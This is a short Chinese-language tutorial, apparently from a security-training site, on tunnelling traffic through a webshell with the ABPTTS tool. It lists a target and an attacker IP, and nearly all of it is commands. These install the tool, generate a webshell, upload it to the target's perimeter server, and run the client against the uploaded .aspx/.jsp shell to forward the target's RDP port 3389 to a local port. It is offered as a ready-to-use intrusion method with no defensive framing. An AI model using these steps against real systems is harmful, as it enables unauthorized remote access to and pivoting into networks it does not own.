靶机 15.76.11.192 放置webshell
攻击机 201.141.112.91 python abpttsclient.py ‐c webshell/config.txt
0x031 安装
git clone https://github.com/nccgroup/ABPTTS.git
apt install python‐setuptools
apt install python‐pip
pip install ‐‐upgrade pip
python ‐m pip install pycrypto
python ‐m pip install pycryptodome
python ‐m pip install httplib2
cd ABPTTS
python abpttsfactory.py ‐o webshell
![图片[1]-利用Abptts进行正向端口流量转发-赤道学院](https://file.hackdor.com/webfile/2024/12/20241207141810500.png)
![图片[2]-利用Abptts进行正向端口流量转发-赤道学院](https://file.hackdor.com/webfile/2024/12/20241207141810169.png)
0x02 目标边界上传脚本
![图片[3]-利用Abptts进行正向端口流量转发-赤道学院](https://file.hackdor.com/webfile/2024/12/20241207141810191.png)
0x03 攻击机连接
命令格式:
python abpttsclient.py ‐c webshell/config.txt ‐u "http://192.168.1.119/abptts.aspx"
# 将目标边界的3389转发到本地的33389端口上
python abpttsclient.py ‐c webshell/config.txt ‐u "http://15.76.11.192/abptts.jsp"
![图片[4]-利用Abptts进行正向端口流量转发-赤道学院](https://file.hackdor.com/webfile/2024/12/20241207141810162.png)
![图片[5]-利用Abptts进行正向端口流量转发-赤道学院](https://file.hackdor.com/webfile/2024/12/20241207141810341.png)
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
暂无评论内容